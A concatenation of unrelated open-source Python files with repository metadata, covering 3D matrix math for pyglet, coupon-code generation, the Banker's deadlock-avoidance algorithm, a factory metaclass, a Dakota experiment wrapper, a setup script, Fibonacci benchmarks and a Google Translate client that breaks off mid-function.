# Header file for the Math3d library. The C-Runtime has math.h, this file and the
# accompanying math.c are meant to suppliment math.h by adding geometry/math routines
# useful for graphics, simulation, and physics applications (3D stuff).
# Richard S. Wright Jr.
from pyglet.gl import *
from math import sin, cos
M3D_PI = 3.14159265358979323846
M3D_PI_DIV_180 = M3D_PI / 180.0
M3D_INV_PI_DIV_180 = 57.2957795130823229
M3DVector2f = GLfloat * 2
M3DVector3f = GLfloat * 3 # Vector of three floats (x, y, z)
M3DVector4f = GLfloat * 4
M3DMatrix44f = GLfloat * 16 # A 4 X 4 matrix, column major (floats) - OpenGL style
def m3dTransformVector3(vOut, v, m):
vOut[0] = m[0] * v[0] + m[4] * v[1] + m[8] * v[2] + m[12]
vOut[1] = m[1] * v[0] + m[5] * v[1] + m[9] * v[2] + m[13]
vOut[2] = m[2] * v[0] + m[6] * v[1] + m[10] * v[2] + m[14]
def m3dLoadIdentity44(m):
m[0] = m[5] = m[10] = m[15] = 1.0
m[1] = m[2] = m[3] = m[4] = 0.0
m[6] = m[7] = m[8] = m[9] = 0.0
m[11] = m[12] = m[13] = m[14] = 0.0
# Translate matrix. Only 4x4 matrices supported
def m3dTranslateMatrix44(m, x, y, z):
m[12] += x
m[13] += y
m[14] += z
# Scale matrix. Only 4x4 matrices supported
def m3dScaleMatrix44(m, x, y, z):
m[0] *= x
m[5] *= y
m[10] *= z
# Creates a 4x4 rotation matrix, takes radians NOT degrees
def m3dRotationMatrix44(m, angle, x, y, z):
s = sin(angle)
c = cos(angle)
mag = float((x * x + y * y + z * z) ** 0.5)
if mag == 0.0:
m3dLoadIdentity(m)
return
x /= mag
y /= mag
z /= mag
xx = x * x
yy = y * y
zz = z * z
xy = x * y
yz = y * z
zx = z * x
xs = x * s
ys = y * s
zs = z * s
one_c = 1.0 - c
m[0] = (one_c * xx) + c
m[1] = (one_c * xy) - zs
m[2] = (one_c * zx) + ys
m[3] = 0.0
m[4] = (one_c * xy) + zs
m[5] = (one_c * yy) + c
m[6] = (one_c * yz) - xs
m[7] = 0.0
m[8] = (one_c * zx) - ys
m[9] = (one_c * yz) + xs
m[10] = (one_c * zz) + c
m[11] = 0.0
m[12] = 0.0
m[13] = 0.0
m[14] = 0.0
m[15] = 1.0
# Multiply two 4x4 matricies
def m3dMatrixMultiply44(product, a, b):
for i in range(0, 4):
ai0 = a[i]
ai1 = a[i + (1 << 2)]
ai2 = a[i + (2 << 2)]
ai3 = a[i + (3 << 2)]
product[i] = ai0 * b[0] + ai1 * b[1] + ai2 * b[2] + ai3 * b[3]
product[i + (1 << 2)] = ai0 * b[0 + (1 << 2)] + ai1 * b[1 + (1 << 2)] + ai2 * b[2 + (1 << 2)] + ai3 * b[3 + (1 << 2)]
product[i + (2 << 2)] = ai0 * b[0 + (2 << 2)] + ai1 * b[1 + (2 << 2)] + ai2 * b[2 + (2 << 2)] + ai3 * b[3 + (2 << 2)]
product[i + (3 << 2)] = ai0 * b[0 + (3 << 2)] + ai1 * b[1 + (3 << 2)] + ai2 * b[2 + (3 << 2)] + ai3 * b[3 + (3 << 2)]
# Transpose/Invert - Only 4x4 matricies supported
def m3dTransposeMatrix44(dst, src):
for j in range(0, 4):
for i in range(0, 4):
dst[(j * 4) + i] = src[(i * 4) + j]
def m3dDegToRad(num):
return (num * M3D_PI_DIV_180)
def m3dRadToDeg(num):
return (num * M3D_INV_PI_DIV_180)
###########################################################
# Cross Product
# u x v = result
# We only need one version for floats, and one version for doubles. A 3 component
# vector fits in a 4 component vector. If M3DVector4d or M3DVector4f are passed
# we will be OK because 4th component is not used.
def m3dCrossProduct(u, v):
result = M3DVector3f()
result[0] = u[1]*v[2] - v[1]*u[2]
result[1] = -u[0]*v[2] + v[0]*u[2]
result[2] = u[0]*v[1] - v[0]*u[1]
return result
# Calculates the normal of a triangle specified by the three points
# p1, p2, and p3. Each pointer points to an array of three floats. The
# triangle is assumed to be wound counter clockwise.
def m3dFindNormal(point1, point2, point3):
# Temporary vectors
v1 = M3DVector3f()
v2 = M3DVector3f()
# Calculate two vectors from the three points. Assumes counter clockwise
# winding!
v1[0] = point1[0] - point2[0]
v1[1] = point1[1] - point2[1]
v1[2] = point1[2] - point2[2]
v2[0] = point2[0] - point3[0]
v2[1] = point2[1] - point3[1]
v2[2] = point2[2] - point3[2]
# Take the cross product of the two vectors to get
# the normal vector.
return (m3dCrossProduct(v1, v2))
def m3dSetMatrixColumn44(dst, src, col):
dst[col * 4] = src[0]
dst[col * 4 + 1] = src[1]
dst[col * 4 + 2] = src[2]
# dst[col * 4 + 3] = src[3]
# Get Square of a vectors length
# Only for three component vectors
def m3dGetVectorLengthSquared(u):
return (u[0] * u[0] + u[1] * u[1] + u[2] * u[2])
def m3dScaleVector3(v, scale):
v[0] *= scale
v[1] *= scale
v[2] *= scale
# Get length of vector
# Only for three component vectors.
def m3dGetVectorLength(u):
return (m3dGetVectorLengthSquared(u) ** 0.5)
# Normalize a vector
# Scale a vector to unit length. Easy, just scale the vector by it's length
def m3dNormalizeVector(u):
m3dScaleVector3(u, 1.0 / m3dGetVectorLength(u))
# Graceless, but duplicating the one from OpenGL SuperBible would be worse, I think?
# Adds a dependency on numpy, also, which is a bummer.
def m3dInvertMatrix44(dst, src):
try:
from numpy import matrix
except ImportError:
print "You need Numpy."
import sys
sys.exit(1)
mat = matrix( [[src[0], src[1], src[2], src[3]],
[src[4], src[5], src[6], src[7]],
[src[8], src[9], src[10], src[11]],
[src[12], src[13], src[14], src[15]]])
mat = mat.I.tolist()
dst[0] = mat[0][0]
dst[1] = mat[0][1]
dst[2] = mat[0][2]
dst[3] = mat[0][3]
dst[4] = mat[1][0]
dst[5] = mat[1][1]
dst[6] = mat[1][2]
dst[7] = mat[1][3]
dst[8] = mat[2][0]
dst[9] = mat[2][1]
dst[10] = mat[2][2]
dst[11] = mat[2][3]
dst[12] = mat[3][0]
dst[13] = mat[3][1]
dst[14] = mat[3][2]
dst[15] = mat[3][3]
# Dot Product, only for three component vectors
# return u dot v
def m3dDotProduct(u, v):
return (u[0] * v[0] + u[1] * v[1] + u[2] * v[2])
# Get plane equation from three points and a normal
# Calculate the plane equation of the plane that the three specified points lay in. The
# points are given in clockwise winding order, with normal pointing out of clockwise face
# planeEq contains the A,B,C, and D of the plane equation coefficients
def m3dGetPlaneEquation(p1, p2, p3):
planeEq = M3DVector4f()
(v1, v2) = (M3DVector3f(), M3DVector3f())
# V1 = p3 - p1
v1[0] = p3[0] - p1[0]
v1[1] = p3[1] - p1[1]
v1[2] = p3[2] - p1[2]
# V2 = P2 - p1
v2[0] = p2[0] - p1[0]
v2[1] = p2[1] - p1[1]
v2[2] = p2[2] - p1[2]
# Unit normal to plane - Not sure which is the best way here
planeEq3 = m3dCrossProduct(v1, v2)
m3dNormalizeVector(planeEq3)
# Back substitute to get D
planeEq[0] = planeEq3[0]
planeEq[1] = planeEq3[1]
planeEq[2] = planeEq3[2]
planeEq[3] = -(planeEq[0] * p3[0] + planeEq[1] * p3[1] + planeEq[2] * p3[2])
return planeEq
# Planar shadow Matrix
# Creae a projection to "squish" an object into the plane.
# Use m3dGetPlaneEquationf( point1, point2, point3)
# to get a plane equation.
def m3dMakePlanarShadowMatrix(planeEq, vLightPos):
proj = M3DMatrix44f()
# these make the code below easier to read.
a = planeEq[0]
b = planeEq[1]
c = planeEq[2]
d = planeEq[3]
dx = -vLightPos[0]
dy = -vLightPos[1]
dz = -vLightPos[2]
# Now build the projection matrix
proj[0] = b * dy + c * dz
proj[1] = -a * dy
proj[2] = -a * dz
proj[3] = 0.0
proj[4] = -b * dx
proj[5] = a * dx + c * dz
proj[6] = -b * dz
proj[7] = 0.0
proj[8] = -c * dx
proj[9] = -c * dy
proj[10] = a * dx + b * dy
proj[11] = 0.0
proj[12] = -d * dx
proj[13] = -d * dy
proj[14] = -d * dz
proj[15] = a * dx + b * dy + c * dz
# Shadow matrix ready
return proj
| {
"repo_name": "fos/fos-legacy",
"path": "scratch/trycubes/math3d.py",
"copies": "1",
"size": "8209",
"license": "bsd-3-clause",
"hash": -1854048983960857600,
"line_mean": 27.2130584192,
"line_max": 125,
"alpha_frac": 0.5396516019,
"autogenerated": false,
"ratio": 2.489084293511219,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3528735895411219,
"avg_score": null,
"num_lines": null
} |
""" A Python implementation of the Algorithm::CouponCode algorithm.
See:
1. http://search.cpan.org/dist/Algorithm-CouponCode/lib/Algorithm/CouponCode.pm
2. https://github.com/chilts/node-coupon-code/blob/master/coupon-code.js
Author: Brett Patterson <bmp2@rice.edu>
"""
import codecs
import random
BAD_WORDS = map(lambda w: codecs.decode(w, 'rot13'), [
'SHPX', 'PHAG', 'JNAX', 'JNAT', 'CVFF', 'PBPX', 'FUVG', 'GJNG', 'GVGF',
'SNEG', 'URYY', 'ZHSS', 'QVPX', 'XABO', 'NEFR', 'FUNT', 'GBFF', 'FYHG',
'GHEQ', 'FYNT', 'PENC', 'CBBC', 'OHGG', 'SRPX', 'OBBO', 'WVFZ', 'WVMM',
'CUNG'
])
SYMBOLS = list('0123456789ABCDEFGHJKLMNPQRTUVWXY')
SYMBOLS_MAP = {s: i for i, s in enumerate(SYMBOLS)}
PART_SEP = '-'
REPLACEMENTS = [
(r'[^0-9A-Z]+', ''),
(r'O', '0'),
(r'I', '1'),
(r'Z', '2'),
(r'S', '5')
]
def has_bad_word(code):
""" Check if a given code contains a bad word.
"""
for word in BAD_WORDS:
if word in code:
return True
return False
def check_digit(data, n):
""" Generate the check digit for a code part.
"""
for c in data:
n = n * 19 + SYMBOLS_MAP[c]
return SYMBOLS[n % (len(SYMBOLS) - 1)]
def cc_generate(plaintext=None, n_parts=3, part_len=4):
""" Generate a coupon code.
Parameters:
-----------
plaintext : str
A plaintext to generate the code from.
n_parts : int
The number of parts for the code.
part_len : int
The number of symbols in each part.
Returns:
--------
A coupon code string.
"""
parts = []
if plaintext is not None:
raise NotImplementedError(
'Generating a code from plaintext is not yet implemented'
)
while len(parts) == 0 or has_bad_word(''.join(parts)):
for i in range(n_parts):
part = ''
for j in range(part_len - 1):
part += random.choice(SYMBOLS)
part += check_digit(part, i+1)
parts.append(part)
return PART_SEP.join(parts)
def cc_validate(code, n_parts=3, part_len=4):
""" Validate a given code.
Parameters:
-----------
code : str
The code to validate.
n_parts : int
The number of parts for the code.
part_len : int
The number of symbols in each part.
Returns:
--------
A cleaned code if the code is valid, otherwise an empty string.
"""
code = code.upper()
for replacement in REPLACEMENTS:
code = code.replace(*replacement)
parts = code.split(PART_SEP)
if len(parts) != n_parts:
return ''
for i, part in enumerate(parts):
if len(part) != part_len:
return ''
data = part[0:-1]
check = part[-1]
if check != check_digit(data, i+1):
return ''
return code
| {
"repo_name": "brett-patterson/coupon_codes",
"path": "coupon_codes/coupon_codes.py",
"copies": "1",
"size": "2841",
"license": "mit",
"hash": 5468226218571048000,
"line_mean": 22.0975609756,
"line_max": 79,
"alpha_frac": 0.5586061246,
"autogenerated": false,
"ratio": 3.246857142857143,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9305463267457144,
"avg_score": 0,
"num_lines": 123
} |
"""
The Banker's algorithm is a resource allocation and deadlock avoidance algorithm
developed by Edsger Dijkstra that tests for safety by simulating the allocation of
predetermined maximum possible amounts of all resources, and then makes a "s-state"
check to test for possible deadlock conditions for all other pending activities,
before deciding whether allocation should be allowed to continue.
[Source] Wikipedia
[Credit] Rosetta Code C implementation helped very much.
(https://rosettacode.org/wiki/Banker%27s_algorithm)
"""
from __future__ import annotations
import time
import numpy as np
test_claim_vector = [8, 5, 9, 7]
test_allocated_res_table = [
[2, 0, 1, 1],
[0, 1, 2, 1],
[4, 0, 0, 3],
[0, 2, 1, 0],
[1, 0, 3, 0],
]
test_maximum_claim_table = [
[3, 2, 1, 4],
[0, 2, 5, 2],
[5, 1, 0, 5],
[1, 5, 3, 0],
[3, 0, 3, 3],
]
class BankersAlgorithm:
def __init__(
self,
claim_vector: list[int],
allocated_resources_table: list[list[int]],
maximum_claim_table: list[list[int]],
) -> None:
"""
:param claim_vector: A nxn/nxm list depicting the amount of each resources
(eg. memory, interface, semaphores, etc.) available.
:param allocated_resources_table: A nxn/nxm list depicting the amount of each
resource each process is currently holding
:param maximum_claim_table: A nxn/nxm list depicting how much of each resource
the system currently has available
"""
self.__claim_vector = claim_vector
self.__allocated_resources_table = allocated_resources_table
self.__maximum_claim_table = maximum_claim_table
def __processes_resource_summation(self) -> list[int]:
"""
Check for allocated resources in line with each resource in the claim vector
"""
return [
sum(p_item[i] for p_item in self.__allocated_resources_table)
for i in range(len(self.__allocated_resources_table[0]))
]
def __available_resources(self) -> list[int]:
"""
Check for available resources in line with each resource in the claim vector
"""
return np.array(self.__claim_vector) - np.array(
self.__processes_resource_summation()
)
def __need(self) -> list[list[int]]:
"""
Implement safety checker that calculates the needs by ensuring that
max_claim[i][j] - alloc_table[i][j] <= avail[j]
"""
return [
list(np.array(self.__maximum_claim_table[i]) - np.array(allocated_resource))
for i, allocated_resource in enumerate(self.__allocated_resources_table)
]
def __need_index_manager(self) -> dict[int, list[int]]:
"""
This function builds an index control dictionary to track original ids/indices
of processes when altered during execution of method "main"
Return: {0: [a: int, b: int], 1: [c: int, d: int]}
>>> (BankersAlgorithm(test_claim_vector, test_allocated_res_table,
... test_maximum_claim_table)._BankersAlgorithm__need_index_manager()
... ) # doctest: +NORMALIZE_WHITESPACE
{0: [1, 2, 0, 3], 1: [0, 1, 3, 1], 2: [1, 1, 0, 2], 3: [1, 3, 2, 0],
4: [2, 0, 0, 3]}
"""
return {self.__need().index(i): i for i in self.__need()}
def main(self, **kwargs) -> None:
"""
Utilize various methods in this class to simulate the Banker's algorithm
Return: None
>>> BankersAlgorithm(test_claim_vector, test_allocated_res_table,
... test_maximum_claim_table).main(describe=True)
Allocated Resource Table
P1 2 0 1 1
<BLANKLINE>
P2 0 1 2 1
<BLANKLINE>
P3 4 0 0 3
<BLANKLINE>
P4 0 2 1 0
<BLANKLINE>
P5 1 0 3 0
<BLANKLINE>
System Resource Table
P1 3 2 1 4
<BLANKLINE>
P2 0 2 5 2
<BLANKLINE>
P3 5 1 0 5
<BLANKLINE>
P4 1 5 3 0
<BLANKLINE>
P5 3 0 3 3
<BLANKLINE>
Current Usage by Active Processes: 8 5 9 7
Initial Available Resources: 1 2 2 2
__________________________________________________
<BLANKLINE>
Process 3 is executing.
Updated available resource stack for processes: 5 2 2 5
The process is in a safe state.
<BLANKLINE>
Process 1 is executing.
Updated available resource stack for processes: 7 2 3 6
The process is in a safe state.
<BLANKLINE>
Process 2 is executing.
Updated available resource stack for processes: 7 3 5 7
The process is in a safe state.
<BLANKLINE>
Process 4 is executing.
Updated available resource stack for processes: 7 5 6 7
The process is in a safe state.
<BLANKLINE>
Process 5 is executing.
Updated available resource stack for processes: 8 5 9 7
The process is in a safe state.
<BLANKLINE>
"""
need_list = self.__need()
alloc_resources_table = self.__allocated_resources_table
available_resources = self.__available_resources()
need_index_manager = self.__need_index_manager()
for kw, val in kwargs.items():
if kw and val is True:
self.__pretty_data()
print("_" * 50 + "\n")
while need_list:
safe = False
for each_need in need_list:
execution = True
for index, need in enumerate(each_need):
if need > available_resources[index]:
execution = False
break
if execution:
safe = True
# get the original index of the process from ind_ctrl db
for original_need_index, need_clone in need_index_manager.items():
if each_need == need_clone:
process_number = original_need_index
print(f"Process {process_number + 1} is executing.")
# remove the process run from stack
need_list.remove(each_need)
# update available/freed resources stack
available_resources = np.array(available_resources) + np.array(
alloc_resources_table[process_number]
)
print(
"Updated available resource stack for processes: "
+ " ".join([str(x) for x in available_resources])
)
break
if safe:
print("The process is in a safe state.\n")
else:
print("System in unsafe state. Aborting...\n")
break
def __pretty_data(self):
"""
Properly align display of the algorithm's solution
"""
print(" " * 9 + "Allocated Resource Table")
for item in self.__allocated_resources_table:
print(
f"P{self.__allocated_resources_table.index(item) + 1}"
+ " ".join(f"{it:>8}" for it in item)
+ "\n"
)
print(" " * 9 + "System Resource Table")
for item in self.__maximum_claim_table:
print(
f"P{self.__maximum_claim_table.index(item) + 1}"
+ " ".join(f"{it:>8}" for it in item)
+ "\n"
)
print(
"Current Usage by Active Processes: "
+ " ".join(str(x) for x in self.__claim_vector)
)
print(
"Initial Available Resources: "
+ " ".join(str(x) for x in self.__available_resources())
)
time.sleep(1)
if __name__ == "__main__":
import doctest
doctest.testmod()
| {
"repo_name": "TheAlgorithms/Python",
"path": "other/dijkstra_bankers_algorithm.py",
"copies": "1",
"size": "8466",
"license": "mit",
"hash": -6763355121744329000,
"line_mean": 36.6266666667,
"line_max": 88,
"alpha_frac": 0.5302386015,
"autogenerated": false,
"ratio": 4.16019656019656,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.519043516169656,
"avg_score": null,
"num_lines": null
} |
"""A python implementation of the factory design pattern. It's designed for use as a base class
for various types of data gateways.
"""
from __future__ import absolute_import, division, print_function
from .compat import with_metaclass
from .exceptions import InitializationError
__all__ = ['Factory']
class FactoryBase(object):
@classmethod
def initialize(cls, context, default_provider):
cls.context = context
cls._default_provider = (default_provider.__name__ if isinstance(default_provider, type)
else str(default_provider))
if not cls.is_registered_provider(cls._default_provider):
raise RuntimeError("{0} is not a registered provider for "
"{1}".format(cls._default_provider, cls.__name__))
@classmethod
def get_instance(cls, provider=None):
if not hasattr(cls, 'context'):
raise InitializationError("RecordRepoFactory has not been initialized.")
provider = provider.__name__ if isinstance(provider, type) else provider or cls._default_provider # noqa
return cls.providers[provider](cls.context)
@classmethod
def get_registered_provider_names(cls):
return cls.providers.keys()
@classmethod
def get_registered_providers(cls):
return cls.providers.values()
@classmethod
def is_registered_provider(cls, provider):
if isinstance(provider, type):
provider = provider.__name__
return provider in cls.get_registered_provider_names()
class FactoryType(type):
def __init__(cls, name, bases, attr):
super(FactoryType, cls).__init__(name, bases, attr)
if 'skip_registration' in cls.__dict__ and cls.skip_registration:
pass # we don't even care # pragma: no cover
elif cls.factory is None:
# this must be the base implementation; add a factory object
cls.factory = type(cls.__name__ + 'Factory', (FactoryBase, ),
{'providers': dict(), 'cache': dict()})
if hasattr(cls, 'gateways'):
cls.gateways.add(cls)
else:
# must be a derived object, register it as a provider in cls.factory
cls.factory.providers[cls.__name__] = cls
def __call__(cls, *args):
if 'factory' in cls.__dict__:
if args and args[0]:
return cls.factory.get_instance(args[0])
else:
return cls.factory.get_instance()
else:
if not getattr(cls, 'do_cache', False):
return super(FactoryType, cls).__call__(*args)
cache_id = "{0}".format(cls.__name__)
try:
return cls.factory.cache[cache_id]
except KeyError:
instance = super(FactoryType, cls).__call__(*args)
cls.factory.cache[cache_id] = instance
return instance
@with_metaclass(FactoryType)
class Factory(object):
skip_registration = True
factory = None
# ## Document these ##
# __metaclass__
# factory
# skip_registration
# gateways
# do_cache
# TODO: add name parameter --give example from transcomm client factory
| {
"repo_name": "Microsoft/PTVS",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/_vendor/auxlib/factory.py",
"copies": "9",
"size": "3232",
"license": "apache-2.0",
"hash": -8980421693201650000,
"line_mean": 34.1304347826,
"line_max": 113,
"alpha_frac": 0.6048886139,
"autogenerated": false,
"ratio": 4.373477672530447,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0006187398211624897,
"num_lines": 92
} |
"""A Python interface to a Dakota input file."""
import os
import importlib
class Experiment(object):
"""An aggregate of control blocks that define a Dakota input file."""
blocks = ("environment", "method", "variables", "interface", "responses")
"""The named control blocks of a Dakota input file."""
def __init__(
self,
component=None,
plugin=None,
environment="environment",
method="vector_parameter_study",
variables="continuous_design",
interface="direct",
responses="response_functions",
**kwargs
):
"""Create the set of control blocks for a Dakota experiment.
Called with no parameters, a Dakota experiment with basic defaults
(a vector parameter study with the built-in `rosenbrock` example)
is created.
Parameters
----------
component : str, optional
Name of CSDMS component which Dakota is analyzing (default
is None). The `component` and `plugin` parameters are
exclusive.
plugin : str, optional
Name of a plugin model which Dakota is analyzing (default
is None). The `component` and `plugin` parameters are
exclusive.
environment : str, optional
Type of environment used in Dakota experiment (default is
'environment').
method : str, optional
Type of method used in Dakota experiment (default is
'vector_parameter_study').
variables : str, optional
Type of variables used in Dakota experiment (default is
'continuous_design').
interface : str, optional
Type of interface used in Dakota experiment (default is
'direct').
responses : str, optional
Type of responses used in Dakota experiment (default is
'response_functions').
**kwargs
Arbitrary keyword arguments.
Examples
--------
Create a generic Dakota experiment:
>>> x = Experiment()
Create a vector parameter study experiment:
>>> x = Experiment(method='vector_parameter_study')
"""
self.component = component
self.plugin = plugin
if (self.component and self.plugin) is not None:
err_msg = "The component and plugin attributes are exclusive."
raise AttributeError(err_msg)
if self.component is not None:
interface = "fork"
try:
kwargs["analysis_driver"]
except KeyError:
kwargs["analysis_driver"] = "dakota_run_component"
if self.plugin is not None:
interface = "fork"
try:
kwargs["analysis_driver"]
except KeyError:
kwargs["analysis_driver"] = "dakota_run_plugin"
if method == "multidim_parameter_study":
try:
kwargs["lower_bounds"]
except KeyError:
kwargs["lower_bounds"] = (-2.0, -2.0)
try:
kwargs["upper_bounds"]
except KeyError:
kwargs["upper_bounds"] = (2.0, 2.0)
for section in Experiment.blocks:
cls = self._import(section, eval(section), **kwargs)
attr = "_" + section
setattr(self, attr, cls)
@property
def environment(self):
"""The environment control block."""
return self._environment
@environment.setter
def environment(self, value):
"""Set the environment control block.
Parameters
----------
value : obj
An environment control block object, an instance of a
subclass of dakotathon.environment.base.EnvironmentBase.
"""
supr = self._environment.__class__.__bases__[0]
if not isinstance(value, supr):
raise TypeError("Must be a subclass of " + str(supr))
self._environment = value
@property
def method(self):
"""The method control block."""
return self._method
@method.setter
def method(self, value):
"""Set the method control block.
Parameters
----------
value : obj
A method control block object, an instance of a
subclass of dakotathon.method.base.MethodBase.
"""
supr = self._method.__class__.__bases__[0]
if not isinstance(value, supr):
raise TypeError("Must be a subclass of " + str(supr))
self._method = value
@property
def variables(self):
"""The variables control block."""
return self._variables
@variables.setter
def variables(self, value):
"""Set the variables control block.
Parameters
----------
value : obj
A variables control block object, an instance of a
subclass of dakotathon.variables.base.VariablesBase.
"""
supr = self._variables.__class__.__bases__[0]
if not isinstance(value, supr):
raise TypeError("Must be a subclass of " + str(supr))
self._variables = value
@property
def interface(self):
"""The interface control block."""
return self._interface
@interface.setter
def interface(self, value):
"""Set the interface control block.
Parameters
----------
value : obj
An interface control block object, an instance of a
subclass of dakotathon.interface.base.InterfaceBase.
"""
supr = self._interface.__class__.__bases__[0]
if not isinstance(value, supr):
raise TypeError("Must be a subclass of " + str(supr))
self._interface = value
@property
def responses(self):
"""The responses control block."""
return self._responses
@responses.setter
def responses(self, value):
"""Set the responses control block.
Parameters
----------
value : obj
A responses control block object, an instance of a
subclass of dakotathon.responses.base.ResponsesBase.
"""
supr = self._responses.__class__.__bases__[0]
if not isinstance(value, supr):
raise TypeError("Must be a subclass of " + str(supr))
self._responses = value
def _get_subpackage_namespace(self, subpackage):
return os.path.splitext(self.__module__)[0] + "." + subpackage
def _import(self, _subpackage, _module, **kwargs):
namespace = self._get_subpackage_namespace(_subpackage) + "." + _module
module = importlib.import_module(namespace)
cls = getattr(module, module.classname)
return cls(**kwargs)
def __str__(self):
"""The contents of the Dakota input file represented as a string.
Examples
--------
Print the Dakota input file to the console.
>>> x = Experiment()
>>> print(x)
# Dakota input file
environment
tabular_data
tabular_data_file = 'dakota.dat'
<BLANKLINE>
method
vector_parameter_study
final_point = 1.1 1.3
num_steps = 10
<BLANKLINE>
variables
continuous_design = 2
descriptors = 'x1' 'x2'
initial_point = -0.3 0.2
<BLANKLINE>
interface
id_interface = 'CSDMS'
direct
analysis_driver = 'rosenbrock'
<BLANKLINE>
responses
response_functions = 1
response_descriptors = 'y1'
no_gradients
no_hessians
<BLANKLINE>
"""
s = "# Dakota input file\n"
for section in self.blocks:
s += str(getattr(self, section))
return s
| {
"repo_name": "csdms/dakota",
"path": "dakotathon/experiment.py",
"copies": "1",
"size": "7896",
"license": "mit",
"hash": 3412289276435128000,
"line_mean": 29.4864864865,
"line_max": 79,
"alpha_frac": 0.5586372847,
"autogenerated": false,
"ratio": 4.7594936708860756,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 259
} |
"""A Python interface to the SocketLabs API.
See:
http://www.socketlabs.com/api-reference/
https://github.com/MattHealy/socketlabs-python
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='socketlabs',
version='0.1.1',
description='A Python interface to the SocketLabs API.',
long_description=long_description,
url='https://github.com/MattHealy/socketlabs-python',
author='Matt Healy',
author_email='healmatt@gmail.com',
license='MIT',
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Topic :: Communications :: Email',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
],
keywords='socketlabs email',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['requests>=2.5.4.1'],
)
| {
"repo_name": "MattHealy/socketlabs-python",
"path": "setup.py",
"copies": "1",
"size": "1190",
"license": "mit",
"hash": 2466200014788747000,
"line_mean": 29.5128205128,
"line_max": 65,
"alpha_frac": 0.6756302521,
"autogenerated": false,
"ratio": 3.6728395061728394,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.4848469758272839,
"avg_score": null,
"num_lines": null
} |
# A python library comparing the result of FFI imported Rust code to native
# code. It assumes you have the library at /tmp/fibonacci.so
#
# The results are as expected, except for the fast implementation. This could
# be because the overhead of doing the system call takes far longer than the
# running of the python function.
from ctypes import cdll
import time
lib = cdll.LoadLibrary("/tmp/fibonacci.so")
def fib_count(n):
if n < 1:
return 0
elif n < 3:
return 1
a, b = 1, 1
f = 0
for _ in range(3, n+1):
f = a + b
a = b
b = f
return f
def fib_recursive(n):
if n < 1:
return 0
elif n < 2:
return 1
return fib_recursive(n-1) + fib_recursive(n-2)
def fib_recursive_hash(n):
h = {}
def f(n):
if n < 1:
h[n] = 0
return 0
elif n < 2:
h[n] = 1
return 1
a = h.get(n-1, f(n-1))
b = h.get(n-2, f(n-2))
h[n] = a + b
return a + b
return f(n)
fib_num = 35
print("All values count fibonacci for n={}".format(fib_num))
t = float(time.time())
lib.fibonacci_recursive(fib_num)
rt = float(time.time()) - t
print("Time Taken for recursive: {} seconds".format(rt))
t = float(time.time())
fib_recursive(fib_num)
pt = float(time.time()) - t
print("Time Taken for python recursive: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")
t = float(time.time())
lib.fibonacci_hash_recursive(fib_num)
rt = float(time.time()) - t
print("Time Taken for hash: {} seconds".format(rt))
t = float(time.time())
fib_recursive_hash(fib_num)
pt = float(time.time()) - t
print("Time Taken for python recursive hash: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")
t = float(time.time())
lib.fibonacci_fast(fib_num)
rt = float(time.time()) - t
print("Time Taken for fast: {} seconds".format(rt))
t = float(time.time())
fib_count(fib_num)
pt = float(time.time()) - t
print("Time Taken for python fast: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")
print("done!")
| {
"repo_name": "gevious/rust",
"path": "Projects/fibonacci/fib.py",
"copies": "1",
"size": "2180",
"license": "mit",
"hash": 5070413256843912000,
"line_mean": 23.2222222222,
"line_max": 77,
"alpha_frac": 0.6068807339,
"autogenerated": false,
"ratio": 2.9619565217391304,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.406883725563913,
"avg_score": null,
"num_lines": null
} |
"""A python library for interacting with the Google Translate API.
"""
__author__ = "Dan Drinkard <dan.drinkard@gmail.com"
__version__ = "0.1.0"
__copyright__ = "Copyright (c) 2012 Dan Drinkard"
__license__ = "BSD"
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
class GTranslatorError(Exception):
"""Exception for API errors"""
class GTranslatorAPIResponse(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.__dict__)
class GTranslation(GTranslatorAPIResponse):
"""Response object for translations"""
class GLanguage(GTranslatorAPIResponse):
"""Response object for language detection"""
class Translator(object):
version = 'v2'
base_uri = "https://www.googleapis.com/language/translate"
def __init__(self, **kwargs):
self.key = kwargs.get('key', None)
def call(self, method, **kwargs):
if self.key is None:
raise GTranslatorError('Missing Google Services API key.')
url = "%s/%s/%s" % (self.base_uri, self.version, method)
kwargs.update(key=self.key)
request_method = kwargs.get('method', 'GET')
if 'method' in kwargs.keys():
request_method = kwargs['method']
del kwargs['method']
if 'timeout' in kwargs.keys():
timeout = kwargs['timeout']
del kwargs['timeout']
else:
timeout = 3
try:
if request_method == 'GET':
url = "%s?%s" % (url, urllib.urlencode(kwargs))
if kwargs.get('debug'):
print 'calling %s' % url
response = urllib2.urlopen(url, None, timeout).read()
elif request_method == 'POST':
print 'calling %s...' % url
response = urllib2.urlopen(url, urllib.urlencode(kwargs), timeout).read()
else:
raise GTranslatorError('HTTP verbs other than GET and POST aren\'t implemented.')
except urllib2.HTTPError, e:
raise GTranslatorError(e)
except ValueError, e:
raise GTranslatorError(e)
return response
def translate(self, text, **kwargs):
kwargs.update(q=text)
response = json.loads(self.call('', **kwargs))
results = [GTranslation(**translation) for translation in response['data']['translations']]
if len(results) == 1:
return results[0]
return results
def detect(self, text, **kwargs):
kwargs.update(q=text)
